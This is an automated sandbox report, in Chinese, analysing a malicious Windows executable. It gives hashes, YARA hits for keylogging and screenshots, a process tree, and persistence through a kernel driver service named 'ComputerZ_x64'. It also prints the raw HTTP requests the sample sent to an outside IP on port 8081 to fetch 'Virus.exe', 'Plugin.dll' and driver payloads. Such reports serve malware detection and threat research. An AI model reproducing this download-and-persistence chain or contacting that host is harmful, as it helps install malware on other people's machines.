魔盾安全分析报告

分析类型 开始时间 结束时间 持续时间 分析引擎版本
FILE 2020-11-30 12:51:18 2020-11-30 12:53:28 130 秒 1.4-Maldun
虚拟机机器名 标签 虚拟机管理 开机时间 关机时间
win7-sp1-x64-shaapp03-1 win7-sp1-x64-shaapp03-1 KVM 2020-11-30 12:51:19 2020-11-30 12:53:29
魔盾分数

10.0

恶意的

文件详细信息

文件名 13131313.exe
文件大小 790528 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
CRC32 6BB767EB
MD5 1d25ea59f34de2654bdd0944ed923037
SHA1 49786a35bdcab73336dd0b06fd944a27957f9cba
SHA256 90ec36bfc87ae17dacd147138ead049256037df7ba62e6328db16538ffc684c8
SHA512 e6a4e2f5f722c1bebc5c00f1401988d6a3478e9ea5eff107744151c1475bb4f45102529a6b3aeb35e52b41dc91bd3ab1b2508ceb4513631131bf17f87bfd0440
Ssdeep 12288:uFyAi2fm2Nsed36Ugm7YUtvm/nmeAz7cE5ulX:uTu2Welxg4YSvCmeE7cEuh
PEiD 无匹配
Yara
  • CRC32_poly_Constant (Look for CRC32 [poly])
  • CRC32_table (Look for CRC32 table)
  • MD5_Constants (Look for MD5 constants)
  • DES_sbox (Look for DES [sbox])
  • BASE64_table (Look for Base64 table)
  • with_images (Detected the presence of an or several images)
  • with_urls (Detected the presence of an or several urls)
  • IsPE32 (Detected a 32bit PE sample)
  • IsWindowsGUI (Detected a Windows GUI sample)
  • HasRichSignature (Detected Rich Signature)
  • DebuggerTiming__Ticks (Detected timing ticks function)
  • network_http (Detected communications function over HTTP)
  • screenshot (Detected take screenshot function)
  • create_process (Detection function for creating a new process)
  • keylogger (Detected keylogger function)
  • win_registry (Detected system registries modification function)
  • change_win_registry (Change registries to affect system)
  • win_files_operation (Affect private profile)
  • win_hook (Detected hook table access function)
  • win_private_profile (Detected private profile access function)
  • Maldun_Anomoly_Combined_Activities_Network_Logging (Spotted potential abnormal behaviors, like logging and network communications)
  • Maldun_Anomoly_Combined_Activities_7 (Spotted potential malicious behaviors from a small size target, like process manipultion, privilege, token and files)
VirusTotal 无此文件扫描结果

特征

通过进程尝试延迟分析任务
Process: svchosy.exe tried to sleep 80 seconds, actually delayed analysis time by 0 seconds
生成可疑网络流量,可能被用来进行恶意活动
signature: ET POLICY Unsupported/Fake Windows NT Version 5.0
多次尝试建立挂起的进程
强制将一个创建的进程加载为另一个不相关进程的子进程
尝试通过重复调用同一个API多次以拖延分析时间
Spam: svchosy.exe (2660) called API GetSystemTimeAsFileTime 200681 times
装载一个驱动器
driver service name: \Registry\Machine\System\CurrentControlSet\Services\ComputerZ_x64
对一个无法找到的进程进行重复搜索,可能希望以startbrowser=1选项运行
建立TCP连接到一个外部IP地址的非标准端口
Connection: 45.125.56.74:8081
将自己装载到Windows开机自动启动项目
key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ImagePath
data: \??\C:\Users\test\AppData\Local\Temp\ComputerZ_x64.sys
应用程序启动网络连接,可能为漏洞利用或恶意软件下载
http_request: svchosts.exe InternetCrackUrlA http://45.125.56.74:8081/Plugin.dll
http_request: svchosts.exe InternetCrackUrlA http://45.125.56.74:8081/Virus.exe
魔盾安全Yara规则检测结果 - 高危
Critical: Spotted potential abnormal behaviors, like logging and network communications
Critical: Spotted potential malicious behaviors from a small size target, like process manipultion, privilege, token and files
HTTP数据流中包含可疑的恶意软件数据
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://45.125.56.74:8081/Memory.sys
suspicious_request: http://45.125.56.74:8081/Memory2.sys
suspicious_request: http://45.125.56.74:8081/Plugin.dll
suspicious_request: http://45.125.56.74:8081/Virus.exe
发起了一些可疑的HTTP请求
url: http://45.125.56.74:8081/Memory.sys
url: http://45.125.56.74:8081/Memory2.sys
url: http://45.125.56.74:8081/Plugin.dll
url: http://45.125.56.74:8081/Virus.exe
可能是恶意的样本写入可疑的执行文件并混淆扩展名
Suspicious: c:\users\test\appdata\local\temp\computerz_x64.sys
Suspicious: c:\users\test\appdata\local\temp\computerz_x64.sys
Suspicious: c:\users\test\appdata\local\temp\computerz_x64.sys
Suspicious: c:\users\test\appdata\local\temp\computerz_x64.sys
Suspicious: c:\users\test\appdata\local\temp\computerz_x64.sys
Suspicious: c:\users\test\appdata\local\temp\computerz_x64.sys
可能是恶意的样本写入可疑的执行文件和库文件到系统目录并执行
Process: c:\windows\svchosts.exe
Process: c:\windows\svchosy.exe

运行截图

网络分析

域名解析

域名 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net
A 23.63.75.34
A 23.63.75.9

TCP连接

IP地址 端口
23.63.75.9 80
45.125.56.74 8081
45.125.56.74 8081
45.125.56.74 888

UDP连接

IP地址 端口
192.168.122.1 53

HTTP请求

URL HTTP数据
http://45.125.56.74:8081/Memory.sys 
GET /Memory.sys HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
http://45.125.56.74:8081/Memory2.sys 
GET /Memory2.sys HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
Cookie: HFS_SID_=0.890553839271888
http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip 
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache
http://45.125.56.74:8081/Plugin.dll 
GET /Plugin.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
http://45.125.56.74:8081/Virus.exe 
GET /Virus.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
Cookie: HFS_SID_=0.708140051923692

静态分析

PE 信息

初始地址 0x00400000
入口地址 0x0046564e
声明校验值 0x00000000
实际校验值 0x000ca899
最低操作系统版本要求 4.0
编译时间 2020-11-30 12:51:01
载入哈希 6ce94e265482c54fdfe9a5a3dcee76c8
图标
图标精确哈希值 7e8d0dbe5de19f74f384ae459c5abecf
图标相似性哈希值 439e81c5165936c3ea55d4df339c6380

版本信息

LegalCopyright: \xe4\xe8\xe7\xe6\xe6\xe6 \xe8\xe5\xe9\xe5\xe4\xe7\xe6\xe7
FileVersion: 1.0.0.0
Comments: \xe6\xe7\xe5\xe4\xe7\xe6\xe8\xe8\xe7\xe5(http://www.eyuyan.com)
ProductName: \xe6\xe8\xe8\xe7\xe5
ProductVersion: 1.0.0.0
FileDescription: \xe6\xe8\xe8\xe7\xe5
Translation: 0x0804 0x04b0

PE数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x00084762 0x00085000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.58
.rdata 0x00086000 0x00020ef4 0x00021000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.65
.data 0x000a7000 0x000360a8 0x00014000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.98
.rsrc 0x000de000 0x00005958 0x00006000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.82

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_MENU 0x000e17f0 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_MENU 0x000e17f0 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_VERSION 0x000e3548 0x00000240 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.83 data
RT_MANIFEST 0x000e3788 0x000001cd LANG_NEUTRAL SUBLANG_NEUTRAL 5.08 XML 1.0 document, ASCII text, with very long lines, with no line terminators

导入

库 RASAPI32.dll:
0x486398 - RasHangUpA
0x48639c - RasGetConnectStatusA
库 KERNEL32.dll:
0x486174 - lstrcmpiA
0x486178 - SetEndOfFile
0x48617c - UnlockFile
0x486180 - LockFile
0x486184 - FlushFileBuffers
0x486188 - SetFilePointer
0x48618c - DuplicateHandle
0x486190 - lstrcpynA
0x486194 - FileTimeToLocalFileTime
0x486198 - SetLastError
0x48619c - GetTimeZoneInformation
0x4861a0 - FileTimeToSystemTime
0x4861a4 - GetCurrentProcess
0x4861a8 - GetWindowsDirectoryA
0x4861ac - GetSystemDirectoryA
0x4861b0 - CreateSemaphoreA
0x4861b4 - ResumeThread
0x4861b8 - ReleaseSemaphore
0x4861bc - EnterCriticalSection
0x4861c0 - LeaveCriticalSection
0x4861c4 - GetProfileStringA
0x4861c8 - WriteFile
0x4861cc - WaitForMultipleObjects
0x4861d0 - IsBadCodePtr
0x4861d4 - IsBadReadPtr
0x4861d8 - CompareStringW
0x4861dc - CompareStringA
0x4861e0 - SetUnhandledExceptionFilter
0x4861e4 - GetStringTypeW
0x4861e8 - GetStringTypeA
0x4861ec - InterlockedIncrement
0x4861f0 - IsBadWritePtr
0x4861f4 - VirtualAlloc
0x4861f8 - LCMapStringW
0x4861fc - LCMapStringA
0x486200 - SetEnvironmentVariableA
0x486204 - VirtualFree
0x486208 - HeapCreate
0x48620c - HeapDestroy
0x486210 - GetEnvironmentVariableA
0x486214 - GetStdHandle
0x486218 - SetHandleCount
0x48621c - GetEnvironmentStringsW
0x486220 - GetEnvironmentStrings
0x486224 - FreeEnvironmentStringsW
0x486228 - FreeEnvironmentStringsA
0x48622c - UnhandledExceptionFilter
0x486230 - GetFileType
0x486234 - SetStdHandle
0x486238 - GetACP
0x48623c - HeapSize
0x486240 - TerminateProcess
0x486244 - GetLocalTime
0x486248 - GetSystemTime
0x48624c - RaiseException
0x486250 - CreateFileA
0x486254 - SetEvent
0x486258 - FindResourceA
0x48625c - LoadResource
0x486260 - LockResource
0x486264 - ReadFile
0x486268 - GetModuleFileNameA
0x48626c - WideCharToMultiByte
0x486270 - MultiByteToWideChar
0x486274 - GetCurrentThreadId
0x486278 - ExitProcess
0x48627c - GlobalSize
0x486280 - GlobalFree
0x486284 - DeleteCriticalSection
0x486288 - InitializeCriticalSection
0x48628c - lstrcatA
0x486290 - lstrlenA
0x486294 - WinExec
0x486298 - lstrcpyA
0x48629c - FindNextFileA
0x4862a0 - GlobalReAlloc
0x4862a4 - HeapFree
0x4862a8 - HeapReAlloc
0x4862ac - GetProcessHeap
0x4862b0 - HeapAlloc
0x4862b4 - GetFullPathNameA
0x4862b8 - FreeLibrary
0x4862bc - LoadLibraryA
0x4862c0 - GetLastError
0x4862c4 - GetVersionExA
0x4862c8 - WritePrivateProfileStringA
0x4862cc - CreateThread
0x4862d0 - CreateEventA
0x4862d4 - Sleep
0x4862d8 - GlobalAlloc
0x4862dc - GlobalLock
0x4862e0 - GlobalUnlock
0x4862e4 - GetTempPathA
0x4862e8 - FindFirstFileA
0x4862ec - FindClose
0x4862f0 - GetFileAttributesA
0x4862f4 - DeleteFileA
0x4862f8 - SetCurrentDirectoryA
0x4862fc - GetVolumeInformationA
0x486300 - GetModuleHandleA
0x486304 - GetProcAddress
0x486308 - RtlUnwind
0x48630c - GetStartupInfoA
0x486310 - GetOEMCP
0x486314 - GetCPInfo
0x486318 - GetProcessVersion
0x48631c - SetErrorMode
0x486320 - GlobalFlags
0x486324 - GetCurrentThread
0x486328 - GetFileTime
0x48632c - GetFileSize
0x486330 - TlsGetValue
0x486334 - LocalReAlloc
0x486338 - TlsSetValue
0x48633c - TlsFree
0x486340 - GlobalHandle
0x486344 - TlsAlloc
0x486348 - LocalAlloc
0x48634c - lstrcmpA
0x486350 - GetVersion
0x486354 - MulDiv
0x486358 - GetCommandLineA
0x48635c - GetTickCount
0x486360 - CreateProcessA
0x486364 - WaitForSingleObject
0x486368 - CloseHandle
0x48636c - LocalFree
0x486370 - InterlockedDecrement
0x486374 - GlobalGetAtomNameA
0x486378 - GlobalAddAtomA
0x48637c - GlobalFindAtomA
0x486380 - GlobalDeleteAtom
库 USER32.dll:
0x4863b4 - GetCursorPos
0x4863b8 - MessageBoxA
0x4863bc - SetWindowPos
0x4863c0 - SendMessageA
0x4863c4 - DestroyCursor
0x4863c8 - SetParent
0x4863cc - IsWindow
0x4863d0 - PostMessageA
0x4863d4 - GetTopWindow
0x4863d8 - GetParent
0x4863dc - GetSystemMetrics
0x4863e0 - GetFocus
0x4863e4 - GetClientRect
0x4863e8 - InvalidateRect
0x4863ec - ValidateRect
0x4863f0 - UpdateWindow
0x4863f4 - EqualRect
0x4863f8 - GetWindowRect
0x4863fc - SetForegroundWindow
0x486400 - DestroyMenu
0x486404 - IsChild
0x486408 - ReleaseDC
0x48640c - IsRectEmpty
0x486410 - FillRect
0x486414 - GetDC
0x486418 - SetCursor
0x48641c - LoadCursorA
0x486420 - SetActiveWindow
0x486424 - GetSysColor
0x486428 - SetWindowLongA
0x48642c - GetWindowLongA
0x486430 - RedrawWindow
0x486434 - EnableWindow
0x486438 - IsWindowVisible
0x48643c - OffsetRect
0x486440 - PtInRect
0x486444 - DestroyIcon
0x486448 - IntersectRect
0x48644c - InflateRect
0x486450 - SetRect
0x486454 - SetScrollPos
0x486458 - SetScrollRange
0x48645c - GetScrollRange
0x486460 - SetCapture
0x486464 - GetCapture
0x486468 - ReleaseCapture
0x48646c - SetTimer
0x486470 - KillTimer
0x486474 - WinHelpA
0x486478 - LoadBitmapA
0x48647c - CopyRect
0x486480 - ChildWindowFromPointEx
0x486484 - ScreenToClient
0x486488 - GetMessagePos
0x48648c - SetWindowRgn
0x486490 - DestroyAcceleratorTable
0x486494 - GetWindow
0x486498 - GetActiveWindow
0x48649c - SetFocus
0x4864a0 - IsIconic
0x4864a4 - EmptyClipboard
0x4864a8 - SetClipboardData
0x4864ac - OpenClipboard
0x4864b0 - GetClipboardData
0x4864b4 - CloseClipboard
0x4864b8 - wsprintfA
0x4864bc - WaitForInputIdle
0x4864c0 - SetCursorPos
0x4864c4 - BeginPaint
0x4864c8 - GetSysColorBrush
0x4864cc - LoadStringA
0x4864d0 - GetDesktopWindow
0x4864d4 - GetClassNameA
0x4864d8 - GetMenuCheckMarkDimensions
0x4864dc - GetMenuState
0x4864e0 - SetMenuItemBitmaps
0x4864e4 - CheckMenuItem
0x4864e8 - MoveWindow
0x4864ec - IsDialogMessageA
0x4864f0 - ScrollWindowEx
0x4864f4 - SendDlgItemMessageA
0x4864f8 - MapWindowPoints
0x4864fc - AdjustWindowRectEx
0x486500 - SetWindowTextA
0x486504 - GetForegroundWindow
0x486508 - LoadIconA
0x48650c - TranslateMessage
0x486510 - DrawFrameControl
0x486514 - DrawEdge
0x486518 - DrawFocusRect
0x48651c - WindowFromPoint
0x486520 - GetMessageA
0x486524 - DispatchMessageA
0x486528 - SetRectEmpty
0x48652c - RegisterClipboardFormatA
0x486530 - CreateIconFromResourceEx
0x486534 - CreateIconFromResource
0x486538 - DrawIconEx
0x48653c - CreatePopupMenu
0x486540 - AppendMenuA
0x486544 - ModifyMenuA
0x486548 - CreateMenu
0x48654c - CreateAcceleratorTableA
0x486550 - GetDlgCtrlID
0x486554 - GetSubMenu
0x486558 - EnableMenuItem
0x48655c - ClientToScreen
0x486560 - EnumDisplaySettingsA
0x486564 - LoadImageA
0x486568 - SystemParametersInfoA
0x48656c - ShowWindow
0x486570 - IsWindowEnabled
0x486574 - TranslateAcceleratorA
0x486578 - GetKeyState
0x48657c - CopyAcceleratorTableA
0x486580 - PostQuitMessage
0x486584 - IsZoomed
0x486588 - GetClassInfoA
0x48658c - DefWindowProcA
0x486590 - GetSystemMenu
0x486594 - DeleteMenu
0x486598 - GetMenu
0x48659c - SetMenu
0x4865a0 - PeekMessageA
0x4865a4 - GetWindowTextA
0x4865a8 - GetWindowTextLengthA
0x4865ac - CharUpperA
0x4865b0 - GetWindowDC
0x4865b4 - UnregisterClassA
0x4865b8 - EndPaint
0x4865bc - TabbedTextOutA
0x4865c0 - DrawTextA
0x4865c4 - GrayStringA
0x4865c8 - GetDlgItem
0x4865cc - DestroyWindow
0x4865d0 - CreateDialogIndirectParamA
0x4865d4 - EndDialog
0x4865d8 - GetNextDlgTabItem
0x4865dc - GetWindowPlacement
0x4865e0 - RegisterWindowMessageA
0x4865e4 - GetLastActivePopup
0x4865e8 - GetMessageTime
0x4865ec - RemovePropA
0x4865f0 - CallWindowProcA
0x4865f4 - GetPropA
0x4865f8 - UnhookWindowsHookEx
0x4865fc - SetPropA
0x486600 - GetClassLongA
0x486604 - CallNextHookEx
0x486608 - SetWindowsHookExA
0x48660c - CreateWindowExA
0x486610 - GetMenuItemID
0x486614 - GetMenuItemCount
0x486618 - RegisterClassA
0x48661c - GetScrollPos
库 GDI32.dll:
0x486028 - GetSystemPaletteEntries
0x48602c - CreatePalette
0x486030 - StretchBlt
0x486034 - SelectPalette
0x486038 - RealizePalette
0x48603c - GetDIBits
0x486040 - GetWindowExtEx
0x486044 - GetViewportOrgEx
0x486048 - GetWindowOrgEx
0x48604c - BeginPath
0x486050 - EndPath
0x486054 - PathToRegion
0x486058 - CreateEllipticRgn
0x48605c - CreateRoundRectRgn
0x486060 - GetTextColor
0x486064 - GetBkMode
0x486068 - GetBkColor
0x48606c - GetROP2
0x486070 - GetStretchBltMode
0x486074 - GetPolyFillMode
0x486078 - CreateCompatibleBitmap
0x48607c - CreateDCA
0x486080 - CreateBitmap
0x486084 - SelectObject
0x486088 - GetObjectA
0x48608c - CreatePen
0x486090 - PatBlt
0x486094 - CombineRgn
0x486098 - CreateRectRgn
0x48609c - FillRgn
0x4860a0 - CreateSolidBrush
0x4860a4 - GetStockObject
0x4860a8 - CreateFontIndirectA
0x4860ac - EndPage
0x4860b0 - EndDoc
0x4860b4 - DeleteDC
0x4860b8 - CreateDIBitmap
0x4860bc - StartPage
0x4860c0 - BitBlt
0x4860c4 - CreateCompatibleDC
0x4860c8 - DeleteObject
0x4860cc - Rectangle
0x4860d0 - LPtoDP
0x4860d4 - DPtoLP
0x4860d8 - GetCurrentObject
0x4860dc - RoundRect
0x4860e0 - GetTextExtentPoint32A
0x4860e4 - GetDeviceCaps
0x4860e8 - SaveDC
0x4860ec - RestoreDC
0x4860f0 - SetBkMode
0x4860f4 - SetPolyFillMode
0x4860f8 - SetROP2
0x4860fc - SetTextColor
0x486100 - SetMapMode
0x486104 - SetViewportOrgEx
0x486108 - OffsetViewportOrgEx
0x48610c - SetViewportExtEx
0x486110 - ScaleViewportExtEx
0x486114 - SetWindowOrgEx
0x486118 - SetWindowExtEx
0x48611c - ScaleWindowExtEx
0x486120 - GetClipBox
0x486124 - ExcludeClipRect
0x486128 - MoveToEx
0x48612c - LineTo
0x486130 - SelectClipRgn
0x486134 - CreatePolygonRgn
0x486138 - GetClipRgn
0x48613c - SetStretchBltMode
0x486140 - CreateRectRgnIndirect
0x486144 - SetBkColor
0x486148 - ExtSelectClipRgn
0x48614c - Ellipse
0x486150 - StartDocA
0x486154 - GetTextMetricsA
0x486158 - Escape
0x48615c - ExtTextOutA
0x486160 - TextOutA
0x486164 - RectVisible
0x486168 - PtVisible
0x48616c - GetViewportExtEx
库 WINMM.dll:
0x486650 - waveOutUnprepareHeader
0x486654 - waveOutPrepareHeader
0x486658 - waveOutWrite
0x48665c - waveOutPause
0x486660 - waveOutReset
0x486664 - waveOutClose
0x486668 - waveOutGetNumDevs
0x48666c - waveOutOpen
0x486670 - midiOutUnprepareHeader
0x486674 - midiStreamOpen
0x486678 - midiStreamProperty
0x48667c - midiOutPrepareHeader
0x486680 - midiStreamOut
0x486684 - midiStreamStop
0x486688 - midiOutReset
0x48668c - midiStreamClose
0x486690 - midiStreamRestart
库 WINSPOOL.DRV:
0x486698 - ClosePrinter
0x48669c - OpenPrinterA
0x4866a0 - DocumentPropertiesA
库 ADVAPI32.dll:
0x486000 - RegCreateKeyExA
0x486004 - RegQueryValueA
0x486008 - RegCreateKeyA
0x48600c - RegSetValueExA
0x486010 - RegOpenKeyExA
0x486014 - RegCloseKey
库 SHELL32.dll:
0x4863a4 - ShellExecuteA
0x4863a8 - SHGetSpecialFolderPathA
0x4863ac - Shell_NotifyIconA
库 ole32.dll:
0x4866f0 - CLSIDFromString
0x4866f4 - OleUninitialize
0x4866f8 - OleInitialize
库 OLEAUT32.dll:
0x486388 - UnRegisterTypeLib
0x48638c - RegisterTypeLib
0x486390 - LoadTypeLib
库 COMCTL32.dll:
0x48601c - None
0x486020 - ImageList_Destroy
库 WS2_32.dll:
0x4866a8 - closesocket
0x4866ac - send
0x4866b0 - select
0x4866b4 - WSACleanup
0x4866b8 - WSAStartup
0x4866bc - WSAAsyncSelect
0x4866c0 - inet_ntoa
0x4866c4 - recvfrom
0x4866c8 - ioctlsocket
0x4866cc - recv
0x4866d0 - getpeername
0x4866d4 - accept
库 WININET.dll:
0x486624 - HttpQueryInfoA
0x486628 - InternetOpenA
0x48662c - InternetCloseHandle
0x486630 - InternetSetOptionA
0x486634 - InternetConnectA
0x486638 - InternetReadFile
0x48663c - InternetCanonicalizeUrlA
0x486640 - HttpSendRequestA
0x486644 - HttpOpenRequestA
0x486648 - InternetCrackUrlA
库 comdlg32.dll:
0x4866dc - ChooseColorA
0x4866e0 - GetSaveFileNameA
0x4866e4 - GetOpenFileNameA
0x4866e8 - GetFileTitleA

投放文件

无信息

行为分析

互斥量(Mutexes)
  • Local\MSCTF.Asm.MutexDefault1
  • DBWinMutex
  • C:\Windows\svchosy.exe
  • urnQtbS50Lm40Le6pg==
执行的命令
  • C:\Windows\svchosts.exe
  • C:\Windows\svchosy.exe
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  • C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  • C:\Windows\system32\sppsvc.exe
创建的服务
  • ComputerZ_x64
启动的服务
  • ComputerZ_x64

进程

13131313.exe PID: 2312, 上一级进程 PID: 2152

svchosts.exe PID: 2492, 上一级进程 PID: 2312

svchosy.exe PID: 2660, 上一级进程 PID: 2492

services.exe PID: 432, 上一级进程 PID: 344

mscorsvw.exe PID: 2208, 上一级进程 PID: 432

